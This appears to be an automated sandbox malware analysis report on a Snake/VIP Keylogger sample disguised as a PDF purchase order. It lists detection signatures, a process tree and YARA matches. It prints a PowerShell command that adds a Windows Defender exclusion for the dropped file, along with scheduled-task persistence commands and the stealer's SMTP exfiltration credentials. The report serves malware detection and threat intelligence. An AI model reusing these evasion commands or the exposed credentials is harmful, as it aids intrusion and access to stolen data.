Edit tour

Windows Analysis Report
Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Overview

General Information

Sample name:	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Analysis ID:	1541879
MD5:	d8daeb11e006370f3b454df74c382ced
SHA1:	3351af8f5627d4df174d4c659391a40d9563ca37
SHA256:	7b57e6494bb05f09e8a09a69b3c9f28239fe18cb469d223826c95bee2d650197
Tags:	exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe (PID: 1036 cmdline: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe" MD5: D8DAEB11E006370F3B454DF74C382CED)

powershell.exe (PID: 3528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 1280 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe (PID: 2840 cmdline: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe" MD5: D8DAEB11E006370F3B454DF74C382CED)

Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe" MD5: D8DAEB11E006370F3B454DF74C382CED)

QeSBxb.exe (PID: 6708 cmdline: C:\Users\user\AppData\Roaming\QeSBxb.exe MD5: D8DAEB11E006370F3B454DF74C382CED)

schtasks.exe (PID: 636 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

QeSBxb.exe (PID: 4568 cmdline: "C:\Users\user\AppData\Roaming\QeSBxb.exe" MD5: D8DAEB11E006370F3B454DF74C382CED)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000008.00000002.3882761665.0000000003299000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x361447:$a1: get_encryptedPassword 0x3a4667:$a1: get_encryptedPassword 0x3e7687:$a1: get_encryptedPassword 0x361764:$a2: get_encryptedUsername 0x3a4984:$a2: get_encryptedUsername 0x3e79a4:$a2: get_encryptedUsername 0x361257:$a3: get_timePasswordChanged 0x3a4477:$a3: get_timePasswordChanged 0x3e7497:$a3: get_timePasswordChanged 0x361360:$a4: get_passwordField 0x3a4580:$a4: get_passwordField 0x3e75a0:$a4: get_passwordField 0x36145d:$a5: set_encryptedPassword 0x3a467d:$a5: set_encryptedPassword 0x3e769d:$a5: set_encryptedPassword 0x362ae9:$a7: get_logins 0x3a5d09:$a7: get_logins 0x3e8d29:$a7: get_logins 0x362a4c:$a10: KeyLoggerEventArgs 0x3a5c6c:$a10: KeyLoggerEventArgs 0x3e8c8c:$a10: KeyLoggerEventArgs
00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbe187:$a1: get_encryptedPassword 0x1013a7:$a1: get_encryptedPassword 0x1443c7:$a1: get_encryptedPassword 0xbe4a4:$a2: get_encryptedUsername 0x1016c4:$a2: get_encryptedUsername 0x1446e4:$a2: get_encryptedUsername 0xbdf97:$a3: get_timePasswordChanged 0x1011b7:$a3: get_timePasswordChanged 0x1441d7:$a3: get_timePasswordChanged 0xbe0a0:$a4: get_passwordField 0x1012c0:$a4: get_passwordField 0x1442e0:$a4: get_passwordField 0xbe19d:$a5: set_encryptedPassword 0x1013bd:$a5: set_encryptedPassword 0x1443dd:$a5: set_encryptedPassword 0xbf829:$a7: get_logins 0x102a49:$a7: get_logins 0x145a69:$a7: get_logins 0xbf78c:$a10: KeyLoggerEventArgs 0x1029ac:$a10: KeyLoggerEventArgs 0x1459cc:$a10: KeyLoggerEventArgs
Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7a7c3:$a1: get_encryptedPassword 0x7a9fd:$a2: get_encryptedUsername 0x7a5f0:$a3: get_timePasswordChanged 0x7a6ed:$a4: get_passwordField 0x7a7d9:$a5: set_encryptedPassword 0x7c74b:$a7: get_logins 0x7c6c3:$a10: KeyLoggerEventArgs 0x7c459:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 2788	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: QeSBxb.exe PID: 6708	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QeSBxb.exe PID: 6708	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: QeSBxb.exe PID: 6708	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: QeSBxb.exe PID: 6708	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: QeSBxb.exe PID: 6708	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x31ecd:$a1: get_encryptedPassword 0x321e0:$a2: get_encryptedUsername 0x31ce7:$a3: get_timePasswordChanged 0x31df0:$a4: get_passwordField 0x31ee3:$a5: set_encryptedPassword 0x34394:$a7: get_logins 0x342f7:$a10: KeyLoggerEventArgs 0x33f60:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: QeSBxb.exe PID: 4568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QeSBxb.exe PID: 4568	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: QeSBxb.exe PID: 4568	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b5e4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ac87:$a3: \Google\Chrome\User Data\Default\Login Data 0x3aee4:$a4: \Orbitum\User Data\Default\Login Data 0x3b8c3:$a5: \Kometa\User Data\Default\Login Data
9.2.QeSBxb.exe.4828a58.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.QeSBxb.exe.4828a58.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.QeSBxb.exe.4828a58.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.QeSBxb.exe.4828a58.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bb4f:$a1: get_encryptedPassword 0x2be6c:$a2: get_encryptedUsername 0x2b95f:$a3: get_timePasswordChanged 0x2ba68:$a4: get_passwordField 0x2bb65:$a5: set_encryptedPassword 0x2d1f1:$a7: get_logins 0x2d154:$a10: KeyLoggerEventArgs 0x2cdb9:$a11: KeyLoggerEventArgsEventHandler
9.2.QeSBxb.exe.4828a58.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x397e4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38e87:$a3: \Google\Chrome\User Data\Default\Login Data 0x390e4:$a4: \Orbitum\User Data\Default\Login Data 0x39ac3:$a5: \Kometa\User Data\Default\Login Data
9.2.QeSBxb.exe.4828a58.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c75b:$s1: UnHook 0x2c762:$s2: SetHook 0x2c76a:$s3: CallNextHook 0x2c777:$s4: _hook
9.2.QeSBxb.exe.47e5838.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.QeSBxb.exe.47e5838.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.QeSBxb.exe.47e5838.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.QeSBxb.exe.47e5838.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bb4f:$a1: get_encryptedPassword 0x2be6c:$a2: get_encryptedUsername 0x2b95f:$a3: get_timePasswordChanged 0x2ba68:$a4: get_passwordField 0x2bb65:$a5: set_encryptedPassword 0x2d1f1:$a7: get_logins 0x2d154:$a10: KeyLoggerEventArgs 0x2cdb9:$a11: KeyLoggerEventArgsEventHandler
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.QeSBxb.exe.47e5838.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x397e4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38e87:$a3: \Google\Chrome\User Data\Default\Login Data 0x390e4:$a4: \Orbitum\User Data\Default\Login Data 0x39ac3:$a5: \Kometa\User Data\Default\Login Data
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bb4f:$a1: get_encryptedPassword 0x2be6c:$a2: get_encryptedUsername 0x2b95f:$a3: get_timePasswordChanged 0x2ba68:$a4: get_passwordField 0x2bb65:$a5: set_encryptedPassword 0x2d1f1:$a7: get_logins 0x2d154:$a10: KeyLoggerEventArgs 0x2cdb9:$a11: KeyLoggerEventArgsEventHandler
9.2.QeSBxb.exe.47e5838.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c75b:$s1: UnHook 0x2c762:$s2: SetHook 0x2c76a:$s3: CallNextHook 0x2c777:$s4: _hook
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x397e4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38e87:$a3: \Google\Chrome\User Data\Default\Login Data 0x390e4:$a4: \Orbitum\User Data\Default\Login Data 0x39ac3:$a5: \Kometa\User Data\Default\Login Data
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c75b:$s1: UnHook 0x2c762:$s2: SetHook 0x2c76a:$s3: CallNextHook 0x2c777:$s4: _hook
9.2.QeSBxb.exe.4828a58.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.QeSBxb.exe.4828a58.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.QeSBxb.exe.4828a58.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.QeSBxb.exe.4828a58.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.QeSBxb.exe.4828a58.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d94f:$a1: get_encryptedPassword 0x7096f:$a1: get_encryptedPassword 0x2dc6c:$a2: get_encryptedUsername 0x70c8c:$a2: get_encryptedUsername 0x2d75f:$a3: get_timePasswordChanged 0x7077f:$a3: get_timePasswordChanged 0x2d868:$a4: get_passwordField 0x70888:$a4: get_passwordField 0x2d965:$a5: set_encryptedPassword 0x70985:$a5: set_encryptedPassword 0x2eff1:$a7: get_logins 0x72011:$a7: get_logins 0x2ef54:$a10: KeyLoggerEventArgs 0x71f74:$a10: KeyLoggerEventArgs 0x2ebb9:$a11: KeyLoggerEventArgsEventHandler 0x71bd9:$a11: KeyLoggerEventArgsEventHandler
9.2.QeSBxb.exe.4828a58.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e55b:$s1: UnHook 0x7157b:$s1: UnHook 0x2e562:$s2: SetHook 0x71582:$s2: SetHook 0x2e56a:$s3: CallNextHook 0x7158a:$s3: CallNextHook 0x2e577:$s4: _hook 0x71597:$s4: _hook
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb236f:$a1: get_encryptedPassword 0xf558f:$a1: get_encryptedPassword 0x1385af:$a1: get_encryptedPassword 0xb268c:$a2: get_encryptedUsername 0xf58ac:$a2: get_encryptedUsername 0x1388cc:$a2: get_encryptedUsername 0xb217f:$a3: get_timePasswordChanged 0xf539f:$a3: get_timePasswordChanged 0x1383bf:$a3: get_timePasswordChanged 0xb2288:$a4: get_passwordField 0xf54a8:$a4: get_passwordField 0x1384c8:$a4: get_passwordField 0xb2385:$a5: set_encryptedPassword 0xf55a5:$a5: set_encryptedPassword 0x1385c5:$a5: set_encryptedPassword 0xb3a11:$a7: get_logins 0xf6c31:$a7: get_logins 0x139c51:$a7: get_logins 0xb3974:$a10: KeyLoggerEventArgs 0xf6b94:$a10: KeyLoggerEventArgs 0x139bb4:$a10: KeyLoggerEventArgs
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x136d8f:$a1: get_encryptedPassword 0x179faf:$a1: get_encryptedPassword 0x1bcfcf:$a1: get_encryptedPassword 0x1370ac:$a2: get_encryptedUsername 0x17a2cc:$a2: get_encryptedUsername 0x1bd2ec:$a2: get_encryptedUsername 0x136b9f:$a3: get_timePasswordChanged 0x179dbf:$a3: get_timePasswordChanged 0x1bcddf:$a3: get_timePasswordChanged 0x136ca8:$a4: get_passwordField 0x179ec8:$a4: get_passwordField 0x1bcee8:$a4: get_passwordField 0x136da5:$a5: set_encryptedPassword 0x179fc5:$a5: set_encryptedPassword 0x1bcfe5:$a5: set_encryptedPassword 0x138431:$a7: get_logins 0x17b651:$a7: get_logins 0x1be671:$a7: get_logins 0x138394:$a10: KeyLoggerEventArgs 0x17b5b4:$a10: KeyLoggerEventArgs 0x1be5d4:$a10: KeyLoggerEventArgs
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x13799b:$s1: UnHook 0x17abbb:$s1: UnHook 0x1bdbdb:$s1: UnHook 0x1379a2:$s2: SetHook 0x17abc2:$s2: SetHook 0x1bdbe2:$s2: SetHook 0x1379aa:$s3: CallNextHook 0x17abca:$s3: CallNextHook 0x1bdbea:$s3: CallNextHook 0x1379b7:$s4: _hook 0x17abd7:$s4: _hook 0x1bdbf7:$s4: _hook
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d94f:$a1: get_encryptedPassword 0x70b6f:$a1: get_encryptedPassword 0xb3b8f:$a1: get_encryptedPassword 0x2dc6c:$a2: get_encryptedUsername 0x70e8c:$a2: get_encryptedUsername 0xb3eac:$a2: get_encryptedUsername 0x2d75f:$a3: get_timePasswordChanged 0x7097f:$a3: get_timePasswordChanged 0xb399f:$a3: get_timePasswordChanged 0x2d868:$a4: get_passwordField 0x70a88:$a4: get_passwordField 0xb3aa8:$a4: get_passwordField 0x2d965:$a5: set_encryptedPassword 0x70b85:$a5: set_encryptedPassword 0xb3ba5:$a5: set_encryptedPassword 0x2eff1:$a7: get_logins 0x72211:$a7: get_logins 0xb5231:$a7: get_logins 0x2ef54:$a10: KeyLoggerEventArgs 0x72174:$a10: KeyLoggerEventArgs 0xb5194:$a10: KeyLoggerEventArgs
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b5e4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e804:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc1824:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ac87:$a3: \Google\Chrome\User Data\Default\Login Data 0x7dea7:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0ec7:$a3: \Google\Chrome\User Data\Default\Login Data 0x3aee4:$a4: \Orbitum\User Data\Default\Login Data 0x7e104:$a4: \Orbitum\User Data\Default\Login Data 0xc1124:$a4: \Orbitum\User Data\Default\Login Data 0x3b8c3:$a5: \Kometa\User Data\Default\Login Data 0x7eae3:$a5: \Kometa\User Data\Default\Login Data 0xc1b03:$a5: \Kometa\User Data\Default\Login Data
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e55b:$s1: UnHook 0x7177b:$s1: UnHook 0xb479b:$s1: UnHook 0x2e562:$s2: SetHook 0x71782:$s2: SetHook 0xb47a2:$s2: SetHook 0x2e56a:$s3: CallNextHook 0x7178a:$s3: CallNextHook 0xb47aa:$s3: CallNextHook 0x2e577:$s4: _hook 0x71797:$s4: _hook 0xb47b7:$s4: _hook
1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb2f7b:$s1: UnHook 0xf619b:$s1: UnHook 0x1391bb:$s1: UnHook 0xb2f82:$s2: SetHook 0xf61a2:$s2: SetHook 0x1391c2:$s2: SetHook 0xb2f8a:$s3: CallNextHook 0xf61aa:$s3: CallNextHook 0x1391ca:$s3: CallNextHook 0xb2f97:$s4: _hook 0xf61b7:$s4: _hook 0x1391d7:$s4: _hook
9.2.QeSBxb.exe.47e5838.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.QeSBxb.exe.47e5838.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.QeSBxb.exe.47e5838.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.QeSBxb.exe.47e5838.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.QeSBxb.exe.47e5838.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d94f:$a1: get_encryptedPassword 0x70b6f:$a1: get_encryptedPassword 0xb3b8f:$a1: get_encryptedPassword 0x2dc6c:$a2: get_encryptedUsername 0x70e8c:$a2: get_encryptedUsername 0xb3eac:$a2: get_encryptedUsername 0x2d75f:$a3: get_timePasswordChanged 0x7097f:$a3: get_timePasswordChanged 0xb399f:$a3: get_timePasswordChanged 0x2d868:$a4: get_passwordField 0x70a88:$a4: get_passwordField 0xb3aa8:$a4: get_passwordField 0x2d965:$a5: set_encryptedPassword 0x70b85:$a5: set_encryptedPassword 0xb3ba5:$a5: set_encryptedPassword 0x2eff1:$a7: get_logins 0x72211:$a7: get_logins 0xb5231:$a7: get_logins 0x2ef54:$a10: KeyLoggerEventArgs 0x72174:$a10: KeyLoggerEventArgs 0xb5194:$a10: KeyLoggerEventArgs
9.2.QeSBxb.exe.47e5838.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e55b:$s1: UnHook 0x7177b:$s1: UnHook 0xb479b:$s1: UnHook 0x2e562:$s2: SetHook 0x71782:$s2: SetHook 0xb47a2:$s2: SetHook 0x2e56a:$s3: CallNextHook 0x7178a:$s3: CallNextHook 0xb47aa:$s3: CallNextHook 0x2e577:$s4: _hook 0x71797:$s4: _hook 0xb47b7:$s4: _hook
Click to see the 45 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

